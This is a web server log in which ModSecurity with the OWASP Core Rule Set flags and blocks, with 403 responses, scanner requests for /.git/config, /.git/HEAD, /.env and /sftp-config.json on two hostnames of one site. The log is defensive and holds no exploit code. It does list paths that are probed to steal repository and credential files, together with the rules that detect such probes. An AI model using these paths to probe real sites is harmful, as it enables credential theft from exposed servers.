[Sat Apr 05 08:55:49.582775 2025] [:error] [pid 2270270] [client 194.163.152.77:44430] [client 194.163.152.77] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z_DT9b8yip9UmJ03VneqvwAAAAQ"]
[Sat Apr 05 08:55:49.582945 2025] [:error] [pid 2270270] [client 194.163.152.77:44430] [client 194.163.152.77] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z_DT9b8yip9UmJ03VneqvwAAAAQ"]
[Sat Apr 05 08:55:49.591307 2025] [:error] [pid 2270269] [client 194.163.152.77:44428] [client 194.163.152.77] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z_DT9YekNXxRXncrShKl8QAAAAM"]
[Sat Apr 05 08:55:49.591542 2025] [:error] [pid 2270269] [client 194.163.152.77:44428] [client 194.163.152.77] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z_DT9YekNXxRXncrShKl8QAAAAM"]
[Sat Apr 05 08:55:49.591682 2025] [:error] [pid 2270269] [client 194.163.152.77:44428] [client 194.163.152.77] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z_DT9YekNXxRXncrShKl8QAAAAM"]
[Sat Apr 05 21:44:28.705104 2025] [:error] [pid 2279754] [client 89.248.163.34:34768] [client 89.248.163.34] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z_GIHDA6y7Yce_1SthBlJgAAAAo"]
[Sat Apr 05 21:44:28.705354 2025] [:error] [pid 2279754] [client 89.248.163.34:34768] [client 89.248.163.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z_GIHDA6y7Yce_1SthBlJgAAAAo"]
[Sat Apr 05 21:44:28.705546 2025] [:error] [pid 2279754] [client 89.248.163.34:34768] [client 89.248.163.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z_GIHDA6y7Yce_1SthBlJgAAAAo"]
[Sat Apr 12 11:44:28.872147 2025] [:error] [pid 2423035] [client 194.163.143.168:35992] [client 194.163.143.168] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z_o1_Lhrkcht8jQUmc37JAAAAAI"]
[Sat Apr 12 11:44:28.873225 2025] [:error] [pid 2423035] [client 194.163.143.168:35992] [client 194.163.143.168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z_o1_Lhrkcht8jQUmc37JAAAAAI"]
[Sat Apr 12 11:44:28.873394 2025] [:error] [pid 2423035] [client 194.163.143.168:35992] [client 194.163.143.168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z_o1_Lhrkcht8jQUmc37JAAAAAI"]
[Sun Apr 13 06:35:13.384253 2025] [:error] [pid 2444560] [client 3.87.19.194:51752] [client 3.87.19.194] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "Z_s_AZLrRReDYDcVXGDjAQAAAAI"]
[Sun Apr 13 06:35:13.384499 2025] [:error] [pid 2444560] [client 3.87.19.194:51752] [client 3.87.19.194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "Z_s_AZLrRReDYDcVXGDjAQAAAAI"]
[Sun Apr 13 06:35:13.384767 2025] [:error] [pid 2444560] [client 3.87.19.194:51752] [client 3.87.19.194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "Z_s_AZLrRReDYDcVXGDjAQAAAAI"]
[Sun Apr 13 06:35:13.710000 2025] [:error] [pid 2446844] [client 3.87.19.194:51756] [client 3.87.19.194] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z_s_Ad_CczMxgaL30EuVYwAAAAg"]
[Sun Apr 13 06:35:13.710306 2025] [:error] [pid 2446844] [client 3.87.19.194:51756] [client 3.87.19.194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z_s_Ad_CczMxgaL30EuVYwAAAAg"]
[Sun Apr 13 06:35:13.710492 2025] [:error] [pid 2446844] [client 3.87.19.194:51756] [client 3.87.19.194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z_s_Ad_CczMxgaL30EuVYwAAAAg"]
[Sun Apr 13 07:04:21.507727 2025] [:error] [pid 2444560] [client 3.87.19.194:50462] [client 3.87.19.194] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "Z_tF1ZLrRReDYDcVXGDjAwAAAAI"]
[Sun Apr 13 07:04:21.508037 2025] [:error] [pid 2444560] [client 3.87.19.194:50462] [client 3.87.19.194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "Z_tF1ZLrRReDYDcVXGDjAwAAAAI"]
[Sun Apr 13 07:04:21.508237 2025] [:error] [pid 2444560] [client 3.87.19.194:50462] [client 3.87.19.194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "Z_tF1ZLrRReDYDcVXGDjAwAAAAI"]
[Sun Apr 13 07:04:21.935560 2025] [:error] [pid 2446851] [client 3.87.19.194:50464] [client 3.87.19.194] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "Z_tF1fQjw2deZjK5N6NfhwAAAAk"]
[Sun Apr 13 07:04:21.935785 2025] [:error] [pid 2446851] [client 3.87.19.194:50464] [client 3.87.19.194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "Z_tF1fQjw2deZjK5N6NfhwAAAAk"]
[Sun Apr 13 07:04:21.935931 2025] [:error] [pid 2446851] [client 3.87.19.194:50464] [client 3.87.19.194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "Z_tF1fQjw2deZjK5N6NfhwAAAAk"]
[Sun Apr 13 15:40:27.566673 2025] [:error] [pid 2446853] [client 196.251.85.192:52092] [client 196.251.85.192] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z_u-y_0hymgfGtbvBfpNUAAAAAs"]
[Sun Apr 13 15:40:27.566951 2025] [:error] [pid 2446853] [client 196.251.85.192:52092] [client 196.251.85.192] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z_u-y_0hymgfGtbvBfpNUAAAAAs"]
[Sun Apr 13 15:40:27.567115 2025] [:error] [pid 2446853] [client 196.251.85.192:52092] [client 196.251.85.192] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z_u-y_0hymgfGtbvBfpNUAAAAAs"]
[Sun Apr 13 15:42:06.085124 2025] [:error] [pid 2444560] [client 196.251.69.194:57654] [client 196.251.69.194] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z_u_LpLrRReDYDcVXGDjHAAAAAI"]
[Sun Apr 13 15:42:06.085426 2025] [:error] [pid 2444560] [client 196.251.69.194:57654] [client 196.251.69.194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z_u_LpLrRReDYDcVXGDjHAAAAAI"]
[Sun Apr 13 15:42:06.085633 2025] [:error] [pid 2444560] [client 196.251.69.194:57654] [client 196.251.69.194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z_u_LpLrRReDYDcVXGDjHAAAAAI"]
[Tue Apr 15 16:39:01.794695 2025] [:error] [pid 2488334] [client 45.148.10.172:48432] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_5vhaAJjpO13hCXqRzPUQAAAAc"]
[Tue Apr 15 16:39:01.796109 2025] [:error] [pid 2488334] [client 45.148.10.172:48432] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_5vhaAJjpO13hCXqRzPUQAAAAc"]
[Tue Apr 15 16:39:01.796292 2025] [:error] [pid 2488334] [client 45.148.10.172:48432] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z_5vhaAJjpO13hCXqRzPUQAAAAc"]
[Wed Apr 16 08:32:35.389730 2025] [:error] [pid 2509273] [client 15.188.51.231:49555] [client 15.188.51.231] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "Z_9PAxP-8mfMl35MuAav5AAAAAI"]
[Wed Apr 16 08:32:35.389995 2025] [:error] [pid 2509273] [client 15.188.51.231:49555] [client 15.188.51.231] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "Z_9PAxP-8mfMl35MuAav5AAAAAI"]
[Wed Apr 16 08:32:35.390168 2025] [:error] [pid 2509273] [client 15.188.51.231:49555] [client 15.188.51.231] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "Z_9PAxP-8mfMl35MuAav5AAAAAI"]
[Wed Apr 16 20:13:38.215754 2025] [:error] [pid 2509273] [client 93.123.109.7:43876] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z__zUhP-8mfMl35MuAawCQAAAAI"]
[Wed Apr 16 20:13:38.216029 2025] [:error] [pid 2509273] [client 93.123.109.7:43876] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z__zUhP-8mfMl35MuAawCQAAAAI"]
[Wed Apr 16 20:13:38.216189 2025] [:error] [pid 2509273] [client 93.123.109.7:43876] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z__zUhP-8mfMl35MuAawCQAAAAI"]
[Wed Apr 16 20:13:38.308412 2025] [:error] [pid 2523126] [client 93.123.109.7:43892] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z__zUgze2pMalYqt8mEv-QAAAAU"]
[Wed Apr 16 20:13:38.308675 2025] [:error] [pid 2523126] [client 93.123.109.7:43892] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z__zUgze2pMalYqt8mEv-QAAAAU"]
[Wed Apr 16 20:13:38.308821 2025] [:error] [pid 2523126] [client 93.123.109.7:43892] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z__zUgze2pMalYqt8mEv-QAAAAU"]
